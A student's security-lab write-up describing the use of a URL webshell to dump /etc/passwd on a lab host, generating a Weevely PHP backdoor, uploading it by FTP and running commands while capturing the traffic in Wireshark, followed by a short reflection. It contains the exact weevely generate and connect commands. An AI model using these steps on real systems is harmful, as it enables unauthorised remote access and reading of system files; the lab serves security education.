Using the URL webshell method as shown in Assignment 7.1, I invoked a webshell to dump the contents of /etc/passwd on the Pippin target system.
I ran a wireshark capture during the dump and was able to view the contents of the dump in the TCP stream.
Note: The TCP stream is accessed by using Right Click > Follow > TCP Stream.
Weevely Webshell Wireshark Capture
Weevely is a tool that can be used to invoke a webshell on a remote system allowing for the execution of commands remotely.
Before using weevely, I had to create a php agent. I did this with the command, weevely generate PASSWORDGOESHERE zmorbackdoor.php
This will allow the invocation of the webshell remotely using weevely
I then used ftp to upload the zmorbackdoor.php file onto the target host. The method I used is outline in Lab 7.1
I then used the command, weevely http://10.0.5.25/upload/zmorbackdoor.php PASSWORDGOESHERE, to get access to the webshell
I the ran some commands such as whoami, id, and cat /etc/os-release while running a wireshark capture and was able to see the commands and outputs in the TCP stream.
Reflection:
This lab taught me about the use of weevely. I also realize how much of a threat webshells can pose as a vulnerability. On top of this, I learned about how wireshark can be used to intercept packets generated by webshells use and the contents can be seen, which could also be concerning if used maliciously.